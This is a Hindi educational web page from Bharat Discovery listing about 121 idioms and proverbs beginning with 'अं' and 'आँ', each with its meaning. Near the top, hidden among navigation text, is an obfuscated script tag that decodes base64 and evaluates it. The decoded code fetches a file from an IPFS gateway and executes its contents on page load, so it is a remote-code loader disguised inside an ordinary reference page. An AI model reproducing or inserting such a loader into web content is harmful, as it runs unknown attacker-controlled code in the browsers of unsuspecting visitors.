कहावत लोकोक्ति मुहावरे-अं

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

कहावत लोकोक्ति मुहावरे वर्णमाला क्रमानुसार खोजें

                              अं                                                                                              क्ष    त्र    श्र

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

कहावत लोकोक्ति मुहावरे अर्थ

1- आँख का अंधा नाम नैन सुख।

अर्थ - नाम के अनुसार गुण न होना ।

2- आंक से कोदो, नीम जवा।

गाड़र गेहूं बेर चना।।

अर्थ - यदि मदार खूब फूलता है तो कोदो की फ़सल अच्छी है। नीम के पेड़ में अधिक फूल-फल लगते है तो जौ की फ़सल, यदि गाड़र (एक घास जिसे खस भी कहते हैं) की वृद्धि होती है तो गेहूं, बेर और चने की फ़सल अच्छी होती है।

3- आँख आना।

अर्थ - आँख दुखना।

4- आँख उठना

अर्थ - सामने ताकना, किसी पर ध्यान या नजर जाना।

5- आँख उठाकर न देखना

अर्थ - तिरस्कार करना, पूरी तरह से उपेक्षा करना।

6- आँख का काँटा।

अर्थ - शत्रु।

7- आँख का काजल।

अर्थ - अत्यन्त प्रिय।

8- आँख का तारा।

अर्थ - बहुत प्यारा।

9- आँख खुलना।

अर्थ - सावधान होना, भ्रम दूर होना।

10- आँख मारना

अर्थ - आँख से इशारा करना।

11- आँख रखना।

अर्थ - निगरानी करना।

12- आँख लगना

अर्थ - इच्छा होना, झपकी आना, रास्ता देखना, प्रतीक्षा करना।

13- आँखें चार होना।

अर्थ - आमने-सामने होना।

14- आँखें तरेरना।

अर्थ - क्रोध से देखना।

15- आँख नीची कर लेना

अर्थ - लज्जित होना या ऐसी स्थिति में ला देना कि कोई लज्जा, संकोच आदि के कारण स्वाभिमान-पूर्वक किसी की ओर न देख सके।

16- आँखें पथरा जाना।

अर्थ - थक जाना।

17- आँखें फेर लेना।

अर्थ - प्रतिकूल होना।

18- आँखें बिछाना।

अर्थ - प्रेम से स्वागत करना।

19- आँखें मूँदना।

अर्थ - मर जाना।

20- आँखों का काजल चुराना।

अर्थ - गहरी चोरी कर लेना।

21- आँखों का पानी ढलना।

अर्थ - निर्लज्ज होना।

22- आँखों पर चर्बी चढ़ना।

अर्थ - अहंकार से ध्यान तक न देना।

23- आँखों में ख़ून उतरना।

अर्थ - ग़ुस्से से आँखें लाल हो जाना।

24- आँखों में गड़ जाना।

अर्थ - पाने की इच्‍छा होना, बुरा लगना।

25- आँखों में धूल झोंकना।

अर्थ - धोखा देना।

26- आँखों में सरसों फूलना।

अर्थ - विवेक न होना।

27- आँखों से गिरना।

अर्थ - आदर भाव घट जाना।

28- आँच न आने देना।

अर्थ - ज़रा सा भी कष्ट नहीं आने देना।

29- आँचल पकड़ना।

अर्थ - सहारा लेना।

30- अंचल पसारना

अर्थ - याचना करना।

31- आँधी के आम।

अर्थ - सस्ती चीज़ें।

32- आँसू पीकर रह जाना।

अर्थ - भीतर ही भीतर रोकर चुप कर जाना।

33- आँसू पोंछना।

अर्थ - ढाढ़स बँधाना।

34- अंकुश न मानना।

अर्थ - ढिठाई करना।

35- अंग-अंग खिल उठना।

अर्थ - प्रसन्‍न हो जाना ।

36- अंग-अंग फूले न समाना।

अर्थ - बहुत आनंदित होना।

37- अंग टूटना।

अर्थ - थकावट से शरीर में दर्द होना।

38- अंग लगना।

अर्थ - ताक़त देना।

39- अंगार उगलना।

अर्थ - क्रोध में बुरा-भला कहना।

40- अंगार / अंगारे बरसना।

अर्थ - कड़ी धूप होना।

41- अंगारों पर पैर रखना

अर्थ - जोखिम मोल लेना, बहुत बड़े जोखिम का काम करना।

42- अंगारों पर लोटना

अर्थ - रोष और डाह के मारे कुढ़ना, क्रोध से अभिभूत होने के कारण बहुत अधिक कष्ट अनुभूत करना।

43- अँगूठा दिखाना

अर्थ - समय पर इंकार कर देना; कुछ न देने से साफ इन्कार कर जाना।

44- अँगूठी का नगीना।

अर्थ - सजीला और सुन्‍दर दूल्‍हा।

45- अँगूठे पर मारना।

अर्थ - परवाह न करना।

46- अंगूर खट्टे होना

अर्थ - प्राप्‍त न हो सकने पर उस वस्‍तु को रद्दी बताना।

47- अंजर पंजर ढीले होना

अर्थ - (पिटाई, यात्रा, श्रम आदि के कारण) शारीरिक अंगों और जोड़ो का शिथिल हो जाना।

48- अंटा चित्त करना।

अर्थ - पछाड़ देना।

49- अंटी मारना

अर्थ - अर्थ - जुए के खेल में (अपनी हार को जीत में बदलने के लिए) बेईमानी से उँगलियों में कौड़ी छिपाना।

50- अंडा फूट जाना।

अर्थ - भेद खुल जाना।

51- अंडे सेना

अर्थ - घर में बेकार बैठे रहना।

52- अंत पाना / लेना।

अर्थ - भेद जानना।

53- अंत बिगाड़ना।

अर्थ - परिणाम ख़राब कर लेना।

54- अँतडियाँ कुलबुलाना।

अर्थ - बहुत भूख लगना।

55- अँतडियाँ गले पड़ना।

अर्थ - संकट में पड़ना।

56- अँतडियों में बल पड़ना।

अर्थ - पेट में दर्द होना ।

57- अंदर होना।

अर्थ - जेल में बंद होना।

58- अंधाधुंध लुटाना।

अर्थ - बहुत अपव्‍यय करना।

59- अंधा बनाना।

अर्थ - मूर्ख बनाकर धोखा देना।

60- अंधे की लकड़ी/लाठी

अर्थ - एकमात्र सहारा।

61- अंधे के हाथ बटेर लगना

अर्थ - अर्थ - बिना प्रयास बड़ी चीज पा लेना, निगुणी को कोई अमूल्य वस्तु अनायास प्राप्त होना।

62- अँधेर-खाता

अर्थ - अन्‍याय, अव्यवस्था, घपला, गड़बड़ी।

63- अंधेर नगरी

अर्थ - जहाँ धाँधली हो।

64- अँधेरे घर का उजाला

अर्थ - इकलौता बेटा।

65- अँधेरे में रखना

अर्थ - वस्तु-स्थिति या तथ्यों से अवगत या परिचित न कराना, भेद रखना।

66- अँधों में काना राजा।

अर्थ - अयोग्य के बीच कम योग्‍यता प्राप्‍त भी सम्‍मान पाता है।

67- अंक भरना/लगाना। अर्थ - गले लगाना।
68- अंडा ढीला होना अर्थ - कठोर श्रम से थकावट आना।
69- अंतड़ियों में बल पड़ना अर्थ - हँसते-हँसते पेट में दर्द होने लगना।
70- अंतड़ियों के बल खोलना अर्थ - भूखे व्यक्ति का छककर भोजन करना।
71- अंगूर तड़कना अर्थ - घाव पर बनी हुई मांस की झिल्ली का फट जाना।
72- अंतड़ियाँ जलना अर्थ - मारे भूख के बेचैन होना।
73- अँगूठे पर मारना अर्थ - (किसी को ) उपेक्ष्य समझना।
74- अँगूठी का नगीना अर्थ - सद तथा श्रेष्ठ गुणो से संपत्र व्यक्ति।
75- अँगूठा छाप अर्थ - दस्तखत न कर सकने के कारण अँगूठे की छाप लगानेवाला, निरक्षर।
76- अंतिम साँसें लेना अर्थ - अंत या समाप्ति के बिल्कुल समीप होना।
77- अंतिम घड़ी आना अर्थ - मृत्यु का समय आना।
78- अंतिम घड़ियाँ गिनना अर्थ - अंत या समाप्ति के निकट होना।
79- अंतर न समझना अर्थ - भेदभाव की दृष्टि से न देखना।
80- अंगारों से खेलना अर्थ - दुस्साहसपूर्ण कार्य करने के लिए उतारु होना।
81- अंगारों पर चलना अर्थ - बहुत बड़े जोखिम का काम करना।
82- अंगार बरसाना अर्थ - क्रोध प्रकट करना।
83- अंगड़ाई लेना अर्थ - गतिमान होना
84- अँगूठा चूसना अर्थ - बालकों का-सा आचरण करना, बचकानी हरकत करना।
85- अँधेरी कोठरी अर्थ - पेट
86- अँधेर मचाना अर्थ - मनमाना विशेषत: अनुचित आचरण करना।
87- अंधे के आगे रोना किसी ऐसे आदमी को अपनी दुख-गाथा सुनाना जो कुछ न कर सकता हो।
88- अँगूठा चूमना अर्थ - चापलूसी या खुशामद करना।
89- अंडा सरक जाना

अर्थ - क्षीण तथा दुर्बल फलत: असमर्थ हो जाना।

90- अंडे की तरह सेना

अर्थ - बचा और छिपाकर रखना।

91- अंत करना/ कर देना

अर्थ - समाप्त या उन्मूलित कर देना।

92- अंत बनना/बन जाना

अर्थ - अंतिम समय अच्छी तरह बीतना।

93- अंत सुधारना

अर्थ - हिंदू कर्मकांड के अनुसार मृतक का संस्कार सुचारु रूप से होना।

94- अंत होना/हो जाना

अर्थ - मर, मिट या नष्ट हो जाना।

95- अंतकाल होना

अर्थ - इंतकाल होना, मरना।

96-अंग ढकना

अर्थ - (अपने) गुप्तांग छिपाना।

97-अंग छूकर कहना

अर्थ - (किसी आत्मीय व्यक्ति का) कोई अंग (विशेषत: हाथ या मस्तक) छूकर (अर्थात् सशपथ) कुछ कहना।

98-अंग उभरना

अर्थ - वक्षस्थल का उभरना।

99-अंग-अंग तोड़ना

अर्थ - अंगड़ाई लेना।

100- अंग-अंग टूटना

अर्थ - शरीर के सभी जोड़ों में दर्द होना।

101-अंग-अंग खिल जाना

अर्थ - अंग-अंग खिल उठना, पूरे शरीर से प्रसन्नता व्यक्त होना।

102- अंकुश लगाना/लगा देना

अर्थ - पाबंदी या रोक लगाना।

103-अंकुश न रखना

अर्थ - नियंत्रण न रखना।

104-अंकुरित होना

अर्थ - अंकुर के रुप में निकलना, उत्पन्न या प्रस्फुटित होना।

105 - अंक में समेटना/समेट लेना

अर्थ - गोद में लेना

106. आँख खुल जाना

अर्थ - वस्तुस्थिति या वास्तविकता का (अंतत:) ज्ञान होना।

107. आँख खोलकर

अर्थ - अच्छी तरह देखते हुए, सावधानी से।

108. आँख खोल देना

अर्थ - सावधान कर देना।

109. आँख गड़ना

अर्थ - एकटक नजर लगी होना, दूसरों की चीज पर (उठा, हथिया या चुरा लेने के उद्देश्य से) ध्यान केंद्रित होना।

110. आँख गड़ाना

अर्थ - एकटक देखते जाना।

111. आँख चमकाना

अर्थ - चुलबुलापन, नजाकत, मस्ती या शोखी दिखाते हुए आँखों की पुतलियाँ बार-बार हिलाना।

112. आँख चुराना

अर्थ - लज्जा, संकोच के कारण किसी का सामना करने से हिचकना।

113. अंग ढीले पड़ना

अर्थ - जोड़ों तथा मांसपेशियों में (पहले कीसी) कसावट न रह जाना, फलतः उनका सुचारू रूप से काम न करना।

114. अंग तोड़ना

अर्थ - (पीड़ा के कारण) हाथ-पाँव पटकना, छटपटाना; कठोर परिश्रम करना

115. अंग फड़कना

अर्थ - शरीर के किस अंग (विशेषतः आँख, हाथ आदि) में कम्पन होना जो लोक में शुभ-अशुभ फलदाायक माना जाता है।

116. अंग फड़कने लगना

अर्थ - आवेश से भर उठना।

117. अंग बन जाना

अर्थ - सदस्य बन या हो जाना।

118. अंग मोड़ लेना

अर्थ - (स्त्री का) लज्जावश अपने अंगों को छिपाना।

119. अंग लगना

अर्थ - सेवित पदार्थ द्वारा शरीर का पुष्ट होना या गले लगना।

120. अंग लगाना

अर्थ - गले लगाना। (वस्त्र आदि) पहनना।

121. अंग शिथिल पड़ जाना

अर्थ - अंगोंं की शक्ति या स्फूर्ति में ह्रास होना।